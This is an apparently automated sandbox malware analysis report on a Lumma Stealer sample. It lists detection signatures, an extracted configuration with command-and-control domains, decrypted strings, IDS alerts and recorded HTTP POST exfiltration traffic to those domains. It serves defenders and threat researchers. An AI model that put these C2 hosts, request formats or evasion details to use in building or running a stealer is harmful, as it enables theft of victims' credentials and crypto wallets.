Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rwsNDpQSKZ.exe

Overview

General Information

Sample name:rwsNDpQSKZ.exe
renamed because original name is a hash value
Original sample name:5989beb7f9f82b27b741ad6a7b091d7003ed059337563d1f1a39eaf85334fedd.exe
Analysis ID:1483410
MD5:35e69f7b1869d8e9cf4270b6ec33ef41
SHA1:0c89e58442108b0f503b3cc586bccc0ec9d6d9e6
SHA256:5989beb7f9f82b27b741ad6a7b091d7003ed059337563d1f1a39eaf85334fedd
Tags:116-203-8-165exeLummaStealer
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • rwsNDpQSKZ.exe (PID: 6820 cmdline: "C:\Users\user\Desktop\rwsNDpQSKZ.exe" MD5: 35E69F7B1869D8E9CF4270B6EC33EF41)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "edfbME--reverseproxy"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1838828037.0000000004B20000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0x4cc14:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
    00000000.00000003.1789398984.0000000003062000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.1789467851.0000000003078000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1789281360.0000000003060000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: rwsNDpQSKZ.exe PID: 6820JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Click to see the 3 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Suricata Signatures

            Timestamp:2024-07-27T11:25:08.531260+0200
            SID:2054603
            Source Port:49733
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:13.089587+0200
            SID:2054603
            Source Port:49736
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:05.948522+0200
            SID:2054603
            Source Port:49731
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:14.578751+0200
            SID:2054603
            Source Port:49737
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:17.261560+0200
            SID:2054603
            Source Port:49738
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:19.539733+0200
            SID:2022930
            Source Port:443
            Destination Port:49739
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:09.041971+0200
            SID:2048094
            Source Port:49733
            Destination Port:443
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-27T11:25:57.781939+0200
            SID:2022930
            Source Port:443
            Destination Port:49745
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:06.794685+0200
            SID:2054653
            Source Port:49731
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:10.219474+0200
            SID:2054603
            Source Port:49734
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:05.275348+0200
            SID:2054592
            Source Port:54782
            Destination Port:53
            Protocol:UDP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:07.307893+0200
            SID:2054603
            Source Port:49732
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:11.033471+0200
            SID:2048094
            Source Port:49734
            Destination Port:443
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-27T11:25:07.786991+0200
            SID:2054653
            Source Port:49732
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:11.748222+0200
            SID:2054603
            Source Port:49735
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:13.537183+0200
            SID:2048094
            Source Port:49736
            Destination Port:443
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://outpointsozp.shop/apiAvira URL Cloud: Label: malware
            Source: lariatedzugspd.shopAvira URL Cloud: Label: malware
            Source: callosallsaospz.shopAvira URL Cloud: Label: malware
            Source: https://outpointsozp.shop:443/apiAvira URL Cloud: Label: malware
            Found malware configuration
            Source: rwsNDpQSKZ.exe.6820.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "edfbME--reverseproxy"}
            Multi AV Scanner detection for domain / URL
            Source: outpointsozp.shopVirustotal: Detection: 19%Perma Link
            Source: https://outpointsozp.shop/apiVirustotal: Detection: 22%Perma Link
            Source: shepherdlyopzc.shopVirustotal: Detection: 19%Perma Link
            Source: lariatedzugspd.shopVirustotal: Detection: 19%Perma Link
            Source: upknittsoappz.shopVirustotal: Detection: 19%Perma Link
            Source: outpointsozp.shopVirustotal: Detection: 19%Perma Link
            Source: https://outpointsozp.shop:443/apiVirustotal: Detection: 22%Perma Link
            Source: unseaffarignsk.shopVirustotal: Detection: 22%Perma Link
            Source: callosallsaospz.shopVirustotal: Detection: 19%Perma Link
            Source: liernessfornicsa.shopVirustotal: Detection: 19%Perma Link
            Multi AV Scanner detection for submitted file
            Source: rwsNDpQSKZ.exeReversingLabs: Detection: 39%
            Source: rwsNDpQSKZ.exeVirustotal: Detection: 45%Perma Link
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmpString decryptor: indexterityszcoxp.shop
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmpString decryptor: lariatedzugspd.shop
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmpString decryptor: callosallsaospz.shop
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmpString decryptor: outpointsozp.shop
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmpString decryptor: liernessfornicsa.shop
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmpString decryptor: upknittsoappz.shop
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmpString decryptor: shepherdlyopzc.shop
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmpString decryptor: unseaffarignsk.shop
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmpString decryptor: outpointsozp.shop
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmpString decryptor: edfbME--reverseproxy
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CAE7E0 ??1LogMessage@logging@@QAE@XZ,?Unlock@CState@Cmm@@QAEXXZ,OutputDebugStringA,?BaseInitLoggingImpl_built_with_NDEBUG@logging@@YA_NPB_WW4LoggingDestination@1@W4LogLockingState@1@W4OldFileDeletionState@1@W4LogEncryptPolicy@1@K@Z,?Unlock@CState@Cmm@@QAEXXZ,SetLastError,0_2_00CAE7E0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C69410 ?Set_devEncryptedType@CSBMBMessage_OpenInviteRoomSystemCalloutTab@@QAEXABH@Z,0_2_00C69410
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C69430 ?Get_devEncryptedType@CSBMBMessage_OpenInviteRoomSystemCalloutTab@@QAEAAHXZ,0_2_00C69430
            Source: rwsNDpQSKZ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: rwsNDpQSKZ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: c:\jenkins\workspace\Client\Client\Windows\release\Bin\Release\ZoomOutlookMAPI.pdb source: rwsNDpQSKZ.exe
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CBE0BE FindFirstFileW,FindClose,0_2_00CBE0BE
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00D067D0 FindFirstFileExW,0_2_00D067D0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C628A3 SetLastError,FindFirstFileW,RemoveDirectoryW,?Unlock@CState@Cmm@@QAEXXZ,GetProcessHeap,HeapFree,FindNextFileW,GetProcessHeap,HeapFree,FindClose,SetLastError,0_2_00C628A3
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C63070 cmm_fs_find_first,cmm_wstr_ncpy,FindFirstFileW,0_2_00C63070

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: indexterityszcoxp.shop
            Source: Malware configuration extractorURLs: lariatedzugspd.shop
            Source: Malware configuration extractorURLs: callosallsaospz.shop
            Source: Malware configuration extractorURLs: outpointsozp.shop
            Source: Malware configuration extractorURLs: liernessfornicsa.shop
            Source: Malware configuration extractorURLs: upknittsoappz.shop
            Source: Malware configuration extractorURLs: upknittsoappz.shop
            Source: Malware configuration extractorURLs: shepherdlyopzc.shop
            Source: Malware configuration extractorURLs: unseaffarignsk.shop
            Source: Malware configuration extractorURLs: indexterityszcoxp.shop
            Source: Malware configuration extractorURLs: lariatedzugspd.shop
            Source: Malware configuration extractorURLs: callosallsaospz.shop
            Source: Malware configuration extractorURLs: outpointsozp.shop
            Source: Malware configuration extractorURLs: liernessfornicsa.shop
            Source: Malware configuration extractorURLs: upknittsoappz.shop
            Source: Malware configuration extractorURLs: upknittsoappz.shop
            Source: Malware configuration extractorURLs: shepherdlyopzc.shop
            Source: Malware configuration extractorURLs: unseaffarignsk.shop
            Source: Malware configuration extractorURLs: indexterityszcoxp.shop
            Source: Malware configuration extractorURLs: lariatedzugspd.shop
            Source: Malware configuration extractorURLs: callosallsaospz.shop
            Source: Malware configuration extractorURLs: outpointsozp.shop
            Source: Malware configuration extractorURLs: liernessfornicsa.shop
            Source: Malware configuration extractorURLs: upknittsoappz.shop
            Source: Malware configuration extractorURLs: upknittsoappz.shop
            Source: Malware configuration extractorURLs: shepherdlyopzc.shop
            Source: Malware configuration extractorURLs: unseaffarignsk.shop
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: outpointsozp.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: outpointsozp.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18170Host: outpointsozp.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8791Host: outpointsozp.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20444Host: outpointsozp.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1283Host: outpointsozp.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 573113Host: outpointsozp.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: outpointsozp.shop
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: outpointsozp.shop
            Source: rwsNDpQSKZ.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1774886576.0000000005B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1774886576.0000000005B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: rwsNDpQSKZ.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
            Source: rwsNDpQSKZ.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA2562021CA1.crt0
            Source: rwsNDpQSKZ.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: rwsNDpQSKZ.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1774886576.0000000005B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: rwsNDpQSKZ.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1774886576.0000000005B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1774886576.0000000005B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: rwsNDpQSKZ.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
            Source: rwsNDpQSKZ.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA2562021CA1.crl0S
            Source: rwsNDpQSKZ.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: rwsNDpQSKZ.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1774886576.0000000005B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: rwsNDpQSKZ.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA2562021CA1.crl0
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1774886576.0000000005B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: rwsNDpQSKZ.exeString found in binary or memory: http://ocsp.digicert.com0
            Source: rwsNDpQSKZ.exeString found in binary or memory: http://ocsp.digicert.com0A
            Source: rwsNDpQSKZ.exeString found in binary or memory: http://ocsp.digicert.com0C
            Source: rwsNDpQSKZ.exeString found in binary or memory: http://ocsp.digicert.com0I
            Source: rwsNDpQSKZ.exeString found in binary or memory: http://ocsp.digicert.com0X
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1774886576.0000000005B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: rwsNDpQSKZ.exeString found in binary or memory: http://www.digicert.com/CPS0
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1774886576.0000000005B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1774886576.0000000005B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776396380.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776396380.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776396380.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776396380.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776396380.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776029335.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1774580193.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1742950186.0000000003078000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1755166515.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789398984.0000000003062000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1774341049.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1754701278.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789813074.0000000003063000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1754897667.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1776396380.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1754389028.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1742903740.000000000304C000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1836784813.0000000003034000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1774644853.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000002.1838245473.0000000003034000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1786885826.0000000005AEC000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789467851.0000000003078000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789281360.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1742844809.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outpointsozp.shop/
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1836784813.0000000003034000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000002.1838245473.0000000003034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outpointsozp.shop/J
